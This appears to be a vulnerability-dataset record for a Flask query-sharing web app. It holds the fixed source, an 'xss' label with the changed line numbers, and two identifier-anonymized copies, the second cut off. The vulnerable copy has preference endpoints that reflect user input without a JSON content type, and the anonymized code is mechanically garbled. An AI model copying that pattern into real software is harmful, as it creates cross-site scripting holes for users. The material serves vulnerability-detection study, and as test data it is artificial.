g.conn.session.commit()
except IntegrityError as e:
if e.args[0] == 1062: # Duplicate
g.conn.session.rollback()
else:
raise
return ""
else:
return "Query not found", 404
@app.route("/query/new")
def new_query():
if get_user() is None:
return redirect("/login?next=/query/new")
query = Query()
query.user = get_user()
g.conn.session.add(query)
g.conn.session.commit()
return redirect(url_for('query_show', query_id=query.id))
@app.route("/fork/<int:id>")
def fork_query(id):
if get_user() is None:
return redirect("/login?next=fork/{id}".format(id=id))
query = Query()
query.user = get_user()
parent_query = g.conn.session.query(Query).filter(Query.id == id).one()
query.title = parent_query.title
query.parent_id = parent_query.id
query.description = parent_query.description
g.conn.session.add(query)
g.conn.session.commit()
query_rev = QueryRevision(query_id=query.id, text=parent_query.latest_rev.text)
query.latest_rev = query_rev
g.conn.session.add(query)
g.conn.session.add(query_rev)
g.conn.session.commit()
return redirect(url_for('query_show', query_id=query.id))
@app.route("/query/<int:query_id>")
def query_show(query_id):
query = g.conn.session.query(Query).filter(Query.id == query_id).one()
can_edit = get_user() is not None and get_user().id == query.user_id
is_starred = False
if get_user():
is_starred = g.conn.session.query(func.count(Star.id))\
.filter(Star.user_id == get_user().id)\
.filter(Star.query_id == query_id).scalar() == 1
jsvars = {
'query_id': query.id,
'can_edit': can_edit,
'is_starred': is_starred,
'published': query.published,
'preferences': get_preferences()
}
if query.latest_rev and query.latest_rev.latest_run_id:
jsvars['qrun_id'] = query.latest_rev.latest_run_id
return render_template(
"query/view.html",
user=get_user(),
query=query,
jsvars=jsvars,
latest_rev=query.latest_rev
)
@app.route('/query/<int:query_id>/result/latest/<string:resultset_id>/<string:format>')
def query_output_redirect(query_id, resultset_id, format):
query = g.conn.session.query(Query).filter(Query.id == query_id).one()
qrun_id = query.latest_rev.latest_run_id
# FIXME: Enforce HTTPS everywhere in a nicer way!
resp = redirect(
url_for('output_result', qrun_id=qrun_id,
resultset_id=resultset_id, format=format,
_external=True, _scheme='https')
)
# CORS on the redirect
resp.headers.add('Access-Control-Allow-Origin', '*')
return resp
@app.route('/api/query/meta', methods=['POST'])
def api_set_meta():
if get_user() is None:
return "Authentication required", 401
query = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if query.user_id != get_user().id:
return "Authorization denied", 403
if 'title' in request.form:
query.title = request.form['title']
if 'published' in request.form:
query.published = request.form['published'] == '1'
if 'description' in request.form:
query.description = request.form['description']
g.conn.session.add(query)
g.conn.session.commit()
return json.dumps({'id': query.id})
@app.route('/api/query/run', methods=['POST'])
def api_run_query():
if get_user() is None:
return "Authentication required", 401
text = request.form['text']
query = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if query.user_id != get_user().id or \
g.conn.session.query(UserGroup).filter(UserGroup.user_id == get_user().id) \
.filter(UserGroup.group_name == 'blocked').first():
return "Authorization denied", 403
if query.latest_rev and query.latest_rev.latest_run:
result = worker.run_query.AsyncResult(query.latest_rev.latest_run.task_id)
if not result.ready():
result.revoke(terminate=True)
query.latest_rev.latest_run.status = QueryRun.STATUS_SUPERSEDED
g.conn.session.add(query.latest_rev.latest_run)
g.conn.session.commit()
query_rev = QueryRevision(query_id=query.id, text=text)
query.latest_rev = query_rev
# XXX (phuedx, 2014/08/08): This deviates from the pre-existing
# QueryRevision interface, but I'm not confident that SQLAlchemy would
# invalidate a cached result for a relationship if a property changed.
query_run = QueryRun()
query_run.rev = query_rev
query_run.status = QueryRun.STATUS_QUEUED
g.conn.session.add(query_run)
g.conn.session.add(query)
g.conn.session.commit()
query_rev.latest_run = query_run
query_run.task_id = worker.run_query.delay(query_run.id).task_id
g.conn.session.add(query_rev)
g.conn.session.add(query_run)
g.conn.session.commit()
return json.dumps({
'qrun_id': query_run.id
})
@app.route("/query/runs/all")
def query_runs_all():
queries = g.conn.session.query(Query)\
.join(Query.latest_rev).join(QueryRevision.latest_run)
queries_filter = 'all'
if request.args.get('published') == 'true':
queries = queries.filter(Query.published)
queries_filter = 'published'
limit = int(request.args.get(
'limit', app.config.get('QUERY_RESULTS_PER_PAGE', 50)))
queries, prev_link, next_link = QueriesRangeBasedPagination(
queries, request.args.get('from'), limit,
request.path,
request.referrer, dict(request.args)).paginate()
return render_template(
"query/list.html", user=get_user(), queries=queries,
prev_link=prev_link, next_link=next_link,
queries_filter=queries_filter)
@app.route('/run/<int:qrun_id>/status')
def run_status(qrun_id):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
return Response('No such query_run id', status=404)
return Response(json.dumps({
'status': qrun.status_message,
'extra': json.loads(qrun.extra_info or '{}'),
'timestamp': qrun.timestamp.strftime('%s')
}), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
@app.route("/run/<int:qrun_id>/output/<int:resultset_id>/<string:format>")
def output_result(qrun_id, resultset_id=0, format='json'):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
response = Response('No such query_run id', status=404)
else:
reader = SQLiteResultReader(qrun, app.config['OUTPUT_PATH_TEMPLATE'])
try:
response = output.get_formatted_response(format, qrun, reader, resultset_id)
except sqlite3.OperationalError as e:
if e.args[0].startswith('no such table'):
response = Response('No such resultset id', status=404)
else:
raise
response.headers['Access-Control-Allow-Origin'] = '*'
return response
@app.route("/run/<int:qrun_id>/meta")
def output_run_meta(qrun_id):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
return Response('No such query run id', status=404)
return Response(json.dumps(
{
'run': qrun,
'rev': qrun.rev,
'query': qrun.rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/rev/<int:rev_id>/meta")
def output_rev_meta(rev_id):
rev = g.conn.session.query(QueryRevision).get(rev_id)
if not rev:
return Response('No such query revision id', status=404)
return Response(json.dumps(
{
'latest_run': rev.latest_run,
'rev': rev,
'query': rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/query/<int:query_id>/meta")
def output_query_meta(query_id):
query = g.conn.session.query(Query).get(query_id)
if not query:
return Response('No such query id', status=404)
return Response(json.dumps(
{
'latest_run': query.latest_rev.latest_run,
'latest_rev': query.latest_rev,
'query': query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/explain/<int:connection_id>")
def output_explain(connection_id):
cur = g.conn.replica.cursor()
try:
cur.execute('SHOW EXPLAIN FOR %d;' % connection_id)
except cur.InternalError as e:
if e.args[0] in [1094, 1915, 1933]:
# 1094 = Unknown thread id
# 1915, 1933 = Target is not running an EXPLAINable command
return Response(json.dumps(
{
'headers': ['Error'],
'rows': [['Hmm... Is the SQL actually running?!']],
}, default=json_formatter),
mimetype='application/json',
)
else:
raise
else:
return Response(json.dumps(
{
'headers': [c[0] for c in cur.description],
'rows': cur.fetchall(),
}, default=json_formatter),
mimetype='application/json',
)
@app.route("/api/preferences/get/<key>")
def pref_get(key):
if get_user() is None:
return "Authentication required", 401
if key in get_preferences():
return Response(
json.dumps({'key': key, 'value': get_preferences()[key]}),
mimetype='application/json'
)
else:
return Response(
json.dumps({'key': key, 'error': 'novalue'}),
mimetype='application/json'
)
@app.route("/api/preferences/set/<key>/<value>")
def pref_set(key, value):
if get_user() is None:
return "Authentication required", 401
get_preferences()[key] = (None if value == 'null' else value)
return Response(
json.dumps({'key': key, 'success': ''}),
mimetype='application/json'
), 201
if __name__ == '__main__':
app.run(port=5000, host="0.0.0.0")
| xss | {
"code": [
" return Response(json.dumps({'key': key, 'value': get_preferences()[key]}))",
" return Response(json.dumps({'key': key, 'error': 'novalue'}))",
" return Response(json.dumps({'key': key, 'success': ''})), 201"
],
"line_no": [
401,
403,
412
]
} | {
"code": [
" return Response(",
" json.dumps({'key': key, 'value': get_preferences()[key]}),",
" mimetype='application/json'",
" return Response(",
" json.dumps({'key': key, 'error': 'novalue'}),",
" mimetype='application/json'",
" )",
" return Response(",
" json.dumps({'key': key, 'success': ''}),",
" mimetype='application/json'",
" ), 201"
],
"line_no": [
401,
402,
403,
406,
407,
408,
409,
418,
419,
420,
421
]
} | import json
import os
import sqlite3
from flask import Flask, render_template, redirect, g, request, url_for, Response
from sqlalchemy import desc, func
from sqlalchemy.exc import IntegrityError
import yaml
from . import worker, output
from .connections import Connections
from .login import auth
from .models.user import UserGroup
from .models.query import Query
from .models.queryrevision import QueryRevision
from .models.queryrun import QueryRun
from .models.star import Star
from .redissession import RedisSessionInterface
from .results import SQLiteResultReader
from .user import user_blueprint, get_user, VAR_31
from .utils import json_formatter
from .utils import monkey as _unused # noqa: F401
from .utils.pagination import RangeBasedPagination
from .health import health_blueprint
from .webhelpers import templatehelpers
__dir__ = os.path.dirname(__file__)
VAR_0 = Flask(__name__)
VAR_0.config.update(yaml.load(open(os.path.join(__dir__, "../default_config.yaml"))))
try:
VAR_0.config.update(yaml.load(open(os.path.join(__dir__, "../config.yaml"))))
except IOError:
pass
VAR_0.register_blueprint(auth)
VAR_0.register_blueprint(health_blueprint)
VAR_0.register_blueprint(user_blueprint)
VAR_0.register_blueprint(templatehelpers)
VAR_1 = Connections(VAR_0.config)
VAR_0.session_interface = RedisSessionInterface(VAR_1.redis)
class CLASS_0(RangeBasedPagination):
def FUNC_20(self, VAR_12, VAR_13):
VAR_32 = dict(request.args)
VAR_32.update({
'from': VAR_12, 'limit': VAR_13})
return url_for('query_runs_all', **dict(
[(VAR_10, VAR_11) for VAR_10, VAR_11 in list(VAR_32.items())])
)
def FUNC_21(self):
if self.direction == 'next':
self.queryset = self.queryset.order_by(desc(QueryRun.timestamp))
else:
self.queryset = self.queryset.order_by(QueryRun.timestamp)
def FUNC_22(self):
if self.page_key is None:
return
VAR_33 = g.conn.session.query(Query).get(self.page_key)
if VAR_33:
VAR_37 = VAR_33.latest_rev.latest_run.id
if self.direction == 'prev':
self.queryset = self.queryset.filter(
QueryRun.id > VAR_37)
else:
self.queryset = self.queryset.filter(
QueryRun.id < VAR_37)
@VAR_0.before_request
def FUNC_0():
g.conn = Connections(VAR_0.config)
@VAR_0.teardown_request
def FUNC_1(VAR_2=None):
g.conn.close_all()
@VAR_0.route("/")
def FUNC_2():
return render_template("landing.html", user=get_user())
@VAR_0.route("/api/VAR_14/unstar", methods=["POST"])
def FUNC_3():
if get_user() is None:
return "Unauthorized access", 403
VAR_14 = g.conn.session.query(Query).get(request.form['query_id'])
if VAR_14:
VAR_34 = g.conn.session.query(Star)\
.filter(Star.query_id == request.form['query_id'])\
.filter(Star.user_id == get_user().id)\
.one()
g.conn.session.delete(VAR_34)
g.conn.session.commit()
return ""
else:
return "Query not found", 404
@VAR_0.route("/api/VAR_14/star", methods=["POST"])
def FUNC_4():
if get_user() is None:
return "Unauthorized access", 403
VAR_14 = g.conn.session.query(Query).get(request.form['query_id'])
if VAR_14:
VAR_34 = Star()
VAR_34.user = get_user()
VAR_34.query = VAR_14
g.conn.session.add(VAR_34)
try:
g.conn.session.commit()
except IntegrityError as e:
if e.args[0] == 1062: # Duplicate
g.conn.session.rollback()
else:
raise
return ""
else:
return "Query not found", 404
@VAR_0.route("/VAR_14/new")
def FUNC_5():
if get_user() is None:
return redirect("/login?next=/VAR_14/new")
VAR_14 = Query()
VAR_14.user = get_user()
g.conn.session.add(VAR_14)
g.conn.session.commit()
return redirect(url_for('query_show', VAR_4=VAR_14.id))
@VAR_0.route("/fork/<int:VAR_3>")
def FUNC_6(VAR_3):
if get_user() is None:
return redirect("/login?next=fork/{VAR_3}".format(VAR_3=id))
VAR_14 = Query()
VAR_14.user = get_user()
VAR_15 = g.conn.session.query(Query).filter(Query.id == VAR_3).one()
VAR_14.title = VAR_15.title
VAR_14.parent_id = VAR_15.id
VAR_14.description = VAR_15.description
g.conn.session.add(VAR_14)
g.conn.session.commit()
VAR_16 = QueryRevision(VAR_4=VAR_14.id, VAR_21=VAR_15.latest_rev.text)
VAR_14.latest_rev = VAR_16
g.conn.session.add(VAR_14)
g.conn.session.add(VAR_16)
g.conn.session.commit()
return redirect(url_for('query_show', VAR_4=VAR_14.id))
@VAR_0.route("/VAR_14/<int:VAR_4>")
def FUNC_7(VAR_4):
VAR_14 = g.conn.session.query(Query).filter(Query.id == VAR_4).one()
VAR_17 = get_user() is not None and get_user().id == VAR_14.user_id
VAR_18 = False
if get_user():
VAR_18 = g.conn.session.query(func.count(Star.id))\
.filter(Star.user_id == get_user().id)\
.filter(Star.query_id == VAR_4).scalar() == 1
VAR_19 = {
'query_id': VAR_14.id,
'can_edit': VAR_17,
'is_starred': VAR_18,
'published': VAR_14.published,
'preferences': VAR_31()
}
if VAR_14.latest_rev and VAR_14.latest_rev.latest_run_id:
VAR_19['qrun_id'] = VAR_14.latest_rev.latest_run_id
return render_template(
"query/view.html",
user=get_user(),
VAR_14=query,
VAR_19=jsvars,
latest_rev=VAR_14.latest_rev
)
@VAR_0.route('/VAR_14/<int:VAR_4>/VAR_35/latest/<string:VAR_5>/<string:VAR_6>')
def FUNC_8(VAR_4, VAR_5, VAR_6):
VAR_14 = g.conn.session.query(Query).filter(Query.id == VAR_4).one()
VAR_7 = VAR_14.latest_rev.latest_run_id
VAR_20 = redirect(
url_for('output_result', VAR_7=qrun_id,
VAR_5=resultset_id, VAR_6=format,
_external=True, _scheme='https')
)
VAR_20.headers.add('Access-Control-Allow-Origin', '*')
return VAR_20
@VAR_0.route('/api/VAR_14/meta', methods=['POST'])
def FUNC_9():
if get_user() is None:
return "Authentication required", 401
VAR_14 = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if VAR_14.user_id != get_user().id:
return "Authorization denied", 403
if 'title' in request.form:
VAR_14.title = request.form['title']
if 'published' in request.form:
VAR_14.published = request.form['published'] == '1'
if 'description' in request.form:
VAR_14.description = request.form['description']
g.conn.session.add(VAR_14)
g.conn.session.commit()
return json.dumps({'id': VAR_14.id})
@VAR_0.route('/api/VAR_14/run', methods=['POST'])
def FUNC_10():
if get_user() is None:
return "Authentication required", 401
VAR_21 = request.form['text']
VAR_14 = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if VAR_14.user_id != get_user().id or \
g.conn.session.query(UserGroup).filter(UserGroup.user_id == get_user().id) \
.filter(UserGroup.group_name == 'blocked').first():
return "Authorization denied", 403
if VAR_14.latest_rev and VAR_14.latest_rev.latest_run:
VAR_35 = worker.run_query.AsyncResult(VAR_14.latest_rev.latest_run.task_id)
if not VAR_35.ready():
VAR_35.revoke(terminate=True)
VAR_14.latest_rev.latest_run.status = QueryRun.STATUS_SUPERSEDED
g.conn.session.add(VAR_14.latest_rev.latest_run)
g.conn.session.commit()
VAR_16 = QueryRevision(VAR_4=VAR_14.id, VAR_21=text)
VAR_14.latest_rev = VAR_16
VAR_22 = QueryRun()
VAR_22.rev = VAR_16
VAR_22.status = QueryRun.STATUS_QUEUED
g.conn.session.add(VAR_22)
g.conn.session.add(VAR_14)
g.conn.session.commit()
VAR_16.latest_run = VAR_22
VAR_22.task_id = worker.run_query.delay(VAR_22.id).task_id
g.conn.session.add(VAR_16)
g.conn.session.add(VAR_22)
g.conn.session.commit()
return json.dumps({
'qrun_id': VAR_22.id
})
@VAR_0.route("/VAR_14/runs/all")
def FUNC_11():
VAR_23 = g.conn.session.query(Query)\
.join(Query.latest_rev).join(QueryRevision.latest_run)
VAR_24 = 'all'
if request.args.get('published') == 'true':
VAR_23 = queries.filter(Query.published)
VAR_24 = 'published'
VAR_13 = int(request.args.get(
'limit', VAR_0.config.get('QUERY_RESULTS_PER_PAGE', 50)))
VAR_23, VAR_25, VAR_26 = CLASS_0(
VAR_23, request.args.get('from'), VAR_13,
request.path,
request.referrer, dict(request.args)).paginate()
return render_template(
"query/list.html", user=get_user(), VAR_23=queries,
VAR_25=prev_link, VAR_26=next_link,
VAR_24=queries_filter)
@VAR_0.route('/run/<int:VAR_7>/status')
def FUNC_12(VAR_7):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
return Response('No such VAR_22 id', status=404)
return Response(json.dumps({
'status': VAR_27.status_message,
'extra': json.loads(VAR_27.extra_info or '{}'),
'timestamp': VAR_27.timestamp.strftime('%s')
}), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
@VAR_0.route("/run/<int:VAR_7>/output/<int:VAR_5>/<string:VAR_6>")
def FUNC_13(VAR_7, VAR_5=0, VAR_6='json'):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
VAR_28 = Response('No such VAR_22 id', status=404)
else:
VAR_36 = SQLiteResultReader(VAR_27, VAR_0.config['OUTPUT_PATH_TEMPLATE'])
try:
VAR_28 = output.get_formatted_response(VAR_6, VAR_27, VAR_36, VAR_5)
except sqlite3.OperationalError as e:
if e.args[0].startswith('no such table'):
VAR_28 = Response('No such resultset id', status=404)
else:
raise
VAR_28.headers['Access-Control-Allow-Origin'] = '*'
return VAR_28
@VAR_0.route("/run/<int:VAR_7>/meta")
def FUNC_14(VAR_7):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
return Response('No such VAR_14 run id', status=404)
return Response(json.dumps(
{
'run': VAR_27,
'rev': VAR_27.rev,
'query': VAR_27.rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/VAR_29/<int:VAR_8>/meta")
def FUNC_15(VAR_8):
VAR_29 = g.conn.session.query(QueryRevision).get(VAR_8)
if not VAR_29:
return Response('No such VAR_14 revision id', status=404)
return Response(json.dumps(
{
'latest_run': VAR_29.latest_run,
'rev': VAR_29,
'query': VAR_29.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/VAR_14/<int:VAR_4>/meta")
def FUNC_16(VAR_4):
VAR_14 = g.conn.session.query(Query).get(VAR_4)
if not VAR_14:
return Response('No such VAR_14 id', status=404)
return Response(json.dumps(
{
'latest_run': VAR_14.latest_rev.latest_run,
'latest_rev': VAR_14.latest_rev,
'query': VAR_14
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/explain/<int:VAR_9>")
def FUNC_17(VAR_9):
VAR_30 = g.conn.replica.cursor()
try:
VAR_30.execute('SHOW EXPLAIN FOR %d;' % VAR_9)
except VAR_30.InternalError as e:
if e.args[0] in [1094, 1915, 1933]:
return Response(json.dumps(
{
'headers': ['Error'],
'rows': [['Hmm... Is the SQL actually running?!']],
}, default=json_formatter),
mimetype='application/json',
)
else:
raise
else:
return Response(json.dumps(
{
'headers': [c[0] for c in VAR_30.description],
'rows': VAR_30.fetchall(),
}, default=json_formatter),
mimetype='application/json',
)
@VAR_0.route("/api/preferences/get/<VAR_10>")
def FUNC_18(VAR_10):
if get_user() is None:
return "Authentication required", 401
if VAR_10 in VAR_31():
return Response(json.dumps({'key': VAR_10, 'value': VAR_31()[VAR_10]}))
else:
return Response(json.dumps({'key': VAR_10, 'error': 'novalue'}))
@VAR_0.route("/api/preferences/set/<VAR_10>/<VAR_11>")
def FUNC_19(VAR_10, VAR_11):
if get_user() is None:
return "Authentication required", 401
VAR_31()[VAR_10] = (None if VAR_11 == 'null' else VAR_11)
return Response(json.dumps({'key': VAR_10, 'success': ''})), 201
if __name__ == '__main__':
VAR_0.run(port=5000, host="0.0.0.0")
| import json
import os
import sqlite3
from flask import Flask, render_template, redirect, g, request, url_for, Response
from sqlalchemy import desc, func
from sqlalchemy.exc import IntegrityError
import yaml
from . import worker, output
from .connections import Connections
from .login import auth
from .models.user import UserGroup
from .models.query import Query
from .models.queryrevision import QueryRevision
from .models.queryrun import QueryRun
from .models.star import Star
from .redissession import RedisSessionInterface
from .results import SQLiteResultReader
from .user import user_blueprint, get_user, VAR_31
from .utils import json_formatter
from .utils import monkey as _unused # noqa: F401
from .utils.pagination import RangeBasedPagination
from .health import health_blueprint
from .webhelpers import templatehelpers
__dir__ = os.path.dirname(__file__)
VAR_0 = Flask(__name__)
VAR_0.config.update(yaml.load(open(os.path.join(__dir__, "../default_config.yaml"))))
try:
VAR_0.config.update(yaml.load(open(os.path.join(__dir__, "../config.yaml"))))
except IOError:
pass
VAR_0.register_blueprint(auth)
VAR_0.register_blueprint(health_blueprint)
VAR_0.register_blueprint(user_blueprint)
VAR_0.register_blueprint(templatehelpers)
VAR_1 = Connections(VAR_0.config)
VAR_0.session_interface = RedisSessionInterface(VAR_1.redis)
class CLASS_0(RangeBasedPagination):
def FUNC_20(self, VAR_12, VAR_13):
VAR_32 = dict(request.args)
VAR_32.update({
'from': VAR_12, 'limit': VAR_13})
return url_for('query_runs_all', **dict(
[(VAR_10, VAR_11) for VAR_10, VAR_11 in list(VAR_32.items())])
)
def FUNC_21(self):
if self.direction == 'next':
self.queryset = self.queryset.order_by(desc(QueryRun.timestamp))
else:
self.queryset = self.queryset.order_by(QueryRun.timestamp)
def FUNC_22(self):
if self.page_key is None:
return
VAR_33 = g.conn.session.query(Query).get(self.page_key)
if VAR_33:
VAR_37 = VAR_33.latest_rev.latest_run.id
if self.direction == 'prev':
self.queryset = self.queryset.filter(
QueryRun.id > VAR_37)
else:
self.queryset = self.queryset.filter(
QueryRun.id < VAR_37)
@VAR_0.before_request
def FUNC_0():
g.conn = Connections(VAR_0.config)
@VAR_0.teardown_request
def FUNC_1(VAR_2=None):
g.conn.close_all()
@VAR_0.route("/")
def FUNC_2():
return render_template("landing.html", user=get_user())
@VAR_0.route("/api/VAR_14/unstar", methods=["POST"])
def FUNC_3():
if get_user() is None:
return "Unauthorized access", 403
VAR_14 = g.conn.session.query(Query).get(request.form['query_id'])
if VAR_14:
VAR_34 = g.conn.session.query(Star)\
.filter(Star.query_id == request.form['query_id'])\
.filter(Star.user_id == get_user().id)\
.one()
g.conn.session.delete(VAR_34)
g.conn.session.commit()
return ""
else:
return "Query not found", 404
@VAR_0.route("/api/VAR_14/star", methods=["POST"])
def FUNC_4():
if get_user() is None:
return "Unauthorized access", 403
VAR_14 = g.conn.session.query(Query).get(request.form['query_id'])
if VAR_14:
VAR_34 = Star()
VAR_34.user = get_user()
VAR_34.query = VAR_14
g.conn.session.add(VAR_34)
try:
g.conn.session.commit()
except IntegrityError as e:
if e.args[0] == 1062: # Duplicate
g.conn.session.rollback()
else:
raise
return ""
else:
return "Query not found", 404
@VAR_0.route("/VAR_14/new")
def FUNC_5():
if get_user() is None:
return redirect("/login?next=/VAR_14/new")
VAR_14 = Query()
VAR_14.user = get_user()
g.conn.session.add(VAR_14)
g.conn.session.commit()
return redirect(url_for('query_show', VAR_4=VAR_14.id))
@VAR_0.route("/fork/<int:VAR_3>")
def FUNC_6(VAR_3):
if get_user() is None:
return redirect("/login?next=fork/{VAR_3}".format(VAR_3=id))
VAR_14 = Query()
VAR_14.user = get_user()
VAR_15 = g.conn.session.query(Query).filter(Query.id == VAR_3).one()
VAR_14.title = VAR_15.title
VAR_14.parent_id = VAR_15.id
VAR_14.description = VAR_15.description
g.conn.session.add(VAR_14)
g.conn.session.commit()
VAR_16 = QueryRevision(VAR_4=VAR_14.id, VAR_21=VAR_15.latest_rev.text)
VAR_14.latest_rev = VAR_16
g.conn.session.add(VAR_14)
g.conn.session.add(VAR_16)
g.conn.session.commit()
return redirect(url_for('query_show', VAR_4=VAR_14.id))
@VAR_0.route("/VAR_14/<int:VAR_4>")
def FUNC_7(VAR_4):
VAR_14 = g.conn.session.query(Query).filter(Query.id == VAR_4).one()
VAR_17 = get_user() is not None and get_user().id == VAR_14.user_id
VAR_18 = False
if get_user():
VAR_18 = g.conn.session.query(func.count(Star.id))\
.filter(Star.user_id == get_user().id)\
.filter(Star.query_id == VAR_4).scalar() == 1
VAR_19 = {
'query_id': VAR_14.id,
'can_edit': VAR_17,
'is_starred': VAR_18,
'published': VAR_14.published,
'preferences': VAR_31()
}
if VAR_14.latest_rev and VAR_14.latest_rev.latest_run_id:
VAR_19['qrun_id'] = VAR_14.latest_rev.latest_run_id
return render_template(
"query/view.html",
user=get_user(),
VAR_14=query,
VAR_19=jsvars,
latest_rev=VAR_14.latest_rev
)
@VAR_0.route('/VAR_14/<int:VAR_4>/VAR_35/latest/<string:VAR_5>/<string:VAR_6>')
def FUNC_8(VAR_4, VAR_5, VAR_6):
VAR_14 = g.conn.session.query(Query).filter(Query.id == VAR_4).one()
VAR_7 = VAR_14.latest_rev.latest_run_id
VAR_20 = redirect(
url_for('output_result', VAR_7=qrun_id,
VAR_5=resultset_id, VAR_6=format,
_external=True, _scheme='https')
)
VAR_20.headers.add('Access-Control-Allow-Origin', '*')
return VAR_20
@VAR_0.route('/api/VAR_14/meta', methods=['POST'])
def FUNC_9():
if get_user() is None:
return "Authentication required", 401
VAR_14 = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if VAR_14.user_id != get_user().id:
return "Authorization denied", 403
if 'title' in request.form:
VAR_14.title = request.form['title']
if 'published' in request.form:
VAR_14.published = request.form['published'] == '1'
if 'description' in request.form:
VAR_14.description = request.form['description']
g.conn.session.add(VAR_14)
g.conn.session.commit()
return json.dumps({'id': VAR_14.id})
@VAR_0.route('/api/VAR_14/run', methods=['POST'])
def FUNC_10():
if get_user() is None:
return "Authentication required", 401
VAR_21 = request.form['text']
VAR_14 = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if VAR_14.user_id != get_user().id or \
g.conn.session.query(UserGroup).filter(UserGroup.user_id == get_user().id) \
.filter(UserGroup.group_name == 'blocked').first():
return "Authorization denied", 403
if VAR_14.latest_rev and VAR_14.latest_rev.latest_run:
VAR_35 = worker.run_query.AsyncResult(VAR_14.latest_rev.latest_run.task_id)
if not VAR_35.ready():
VAR_35.revoke(terminate=True)
VAR_14.latest_rev.latest_run.status = QueryRun.STATUS_SUPERSEDED
g.conn.session.add(VAR_14.latest_rev.latest_run)
g.conn.session.commit()
VAR_16 = QueryRevision(VAR_4=VAR_14.id, VAR_21=text)
VAR_14.latest_rev = VAR_16
VAR_22 = QueryRun()
VAR_22.rev = VAR_16
VAR_22.status = QueryRun.STATUS_QUEUED
g.conn.session.add(VAR_22)
g.conn.session.add(VAR_14)
g.conn.session.commit()
VAR_16.latest_run = VAR_22
VAR_22.task_id = worker.run_query.delay(VAR_22.id).task_id
g.conn.session.add(VAR_16)
g.conn.session.add(VAR_22)
g.conn.session.commit()
return json.dumps({
'qrun_id': VAR_22.id
})
@VAR_0.route("/VAR_14/runs/all")
def FUNC_11():
VAR_23 = g.conn.session.query(Query)\
.join(Query.latest_rev).join(QueryRevision.latest_run)
VAR_24 = 'all'
if request.args.get('published') == 'true':
VAR_23 = queries.filter(Query.published)
VAR_24 = 'published'
VAR_13 = int(request.args.get(
'limit', VAR_0.config.get('QUERY_RESULTS_PER_PAGE', 50)))
VAR_23, VAR_25, VAR_26 = CLASS_0(
VAR_23, request.args.get('from'), VAR_13,
request.path,
request.referrer, dict(request.args)).paginate()
return render_template(
"query/list.html", user=get_user(), VAR_23=queries,
VAR_25=prev_link, VAR_26=next_link,
VAR_24=queries_filter)
@VAR_0.route('/run/<int:VAR_7>/status')
def FUNC_12(VAR_7):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
return Response('No such VAR_22 id', status=404)
return Response(json.dumps({
'status': VAR_27.status_message,
'extra': json.loads(VAR_27.extra_info or '{}'),
'timestamp': VAR_27.timestamp.strftime('%s')
}), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
@VAR_0.route("/run/<int:VAR_7>/output/<int:VAR_5>/<string:VAR_6>")
def FUNC_13(VAR_7, VAR_5=0, VAR_6='json'):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
VAR_28 = Response('No such VAR_22 id', status=404)
else:
VAR_36 = SQLiteResultReader(VAR_27, VAR_0.config['OUTPUT_PATH_TEMPLATE'])
try:
VAR_28 = output.get_formatted_response(VAR_6, VAR_27, VAR_36, VAR_5)
except sqlite3.OperationalError as e:
if e.args[0].startswith('no such table'):
VAR_28 = Response('No such resultset id', status=404)
else:
raise
VAR_28.headers['Access-Control-Allow-Origin'] = '*'
return VAR_28
@VAR_0.route("/run/<int:VAR_7>/meta")
def FUNC_14(VAR_7):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
return Response('No such VAR_14 run id', status=404)
return Response(json.dumps(
{
'run': VAR_27,
'rev': VAR_27.rev,
'query': VAR_27.rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/VAR_29/<int:VAR_8>/meta")
def FUNC_15(VAR_8):
VAR_29 = g.conn.session.query(QueryRevision).get(VAR_8)
if not VAR_29:
return Response('No such VAR_14 revision id', status=404)
return Response(json.dumps(
{
'latest_run': VAR_29.latest_run,
'rev': VAR_29,
'query': VAR_29.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/VAR_14/<int:VAR_4>/meta")
def FUNC_16(VAR_4):
VAR_14 = g.conn.session.query(Query).get(VAR_4)
if not VAR_14:
return Response('No such VAR_14 id', status=404)
return Response(json.dumps(
{
'latest_run': VAR_14.latest_rev.latest_run,
'latest_rev': VAR_14.latest_rev,
'query': VAR_14
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/explain/<int:VAR_9>")
def FUNC_17(VAR_9):
VAR_30 = g.conn.replica.cursor()
try:
VAR_30.execute('SHOW EXPLAIN FOR %d;' % VAR_9)
except VAR_30.InternalError as e:
if e.args[0] in [1094, 1915, 1933]:
return Response(json.dumps(
{
'headers': ['Error'],
'rows': [['Hmm... Is the SQL actually running?!']],
}, default=json_formatter),
mimetype='application/json',
)
else:
raise
else:
return Response(json.dumps(
